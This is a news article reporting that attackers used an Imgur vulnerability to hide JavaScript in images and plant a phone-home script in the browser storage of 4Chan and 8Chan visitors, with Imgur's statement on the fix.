Oh no, you're thinking, yet another cookie pop-up. Well, sorry, it's the law. We measure how many people read us, and ensure you see relevant ads, by storing cookies on your device. If you're cool with that, hit “Accept all Cookies”. For more info and to customize your settings, hit “Customize Settings”.

Review and manage your consent

Here's an overview of our use of cookies, similar technologies and how to manage them. You can also change your choices at any time, by hitting the “Your Consent Options” link on the site's footer.

Manage Cookie Preferences
  • These cookies are strictly necessary so that you can navigate the site as normal and use all features. Without these cookies we cannot provide you with the service that you expect.

  • These cookies are used to make advertising messages more relevant to you. They perform functions like preventing the same ad from continuously reappearing, ensuring that ads are properly displayed for advertisers, and in some cases selecting advertisements that are based on your interests.

  • These cookies collect information in aggregate form to help us understand how our websites are being used. They allow us to count visits and traffic sources so that we can measure and improve the performance of our sites. If people say no to these cookies, we do not know how many people have visited and we cannot monitor performance.

See also our Cookie policy and Privacy policy.

This article is more than 1 year old

Hackers upload bot code to Imgur in 8Chan attack

Image board slings fix at JavaScript hole.

A nasty vulnerability in Imgur was used by attackers to hide malicious code in images, commandeer visitors' browsers, and hose the 4Chan and 8Chan image boards.

Imgur has fixed the hole preventing the upload of malicious images, and says the compromised pages were served in targeted attacks and not published to the site's main gallery page.

The attack planted JavaScript in victims' local storage that sent a ping to the attacker's command and control servers whenever 8Chan was visited.

Compromised images were posted to 4Chan and a related Reddit subreddit page.

The attacker's intent is unknown and the command and control server is not known to have issued commands to infected machines.

Imgur has restricted its servers to hosting only "valid" image files and nixed the ability to serve JavaScript.

"Yesterday a vulnerability was discovered that made it possible to inject malicious code into an image link on Imgur," Imgur community director Sarah Schaaf says.

"From our team's analysis, it appears the exploit was targeted specifically to users of 4chan and 8chan via images shared to a specific sub-reddit on Reddit.com using Imgur’s image hosting and sharing tools.

"The vulnerability was patched yesterday evening and we’re no longer serving affected images, but as a precaution we recommend that you clear your browsing data, cookies, and localstorage."

Reddit users say the attacker's JavaScript created an off-screen iframe and embedded a flash file that ran alongside Imgur's other Flash components making the attack less suspicious.

"This flash file injected more JavaScript into the page [which looked] like an innocuous Pikachu animation," one Reddit user says.

"This JavaScript was stored to the user's localstorage which, since the iframe was pointing at 8chan, allowed the attacker to attach JavaScript to 8chan's localstorage. It's functionality is to issue a GET request to 8chan.pw and then decrypted the response. So far no one has been able to see a response from that web service, meaning it likely wasn't activated yet or has already been deactivated. The outcome is that every time a user visited an 8chan page, it would phone home to check for instructions and then execute more JavaScript code.'

The attacks were reported on various 4Chan boards.

Imgur says it will release more information as it comes to hand.®

 

Similar topics

TIP US OFF

Send us news


Other stories you might like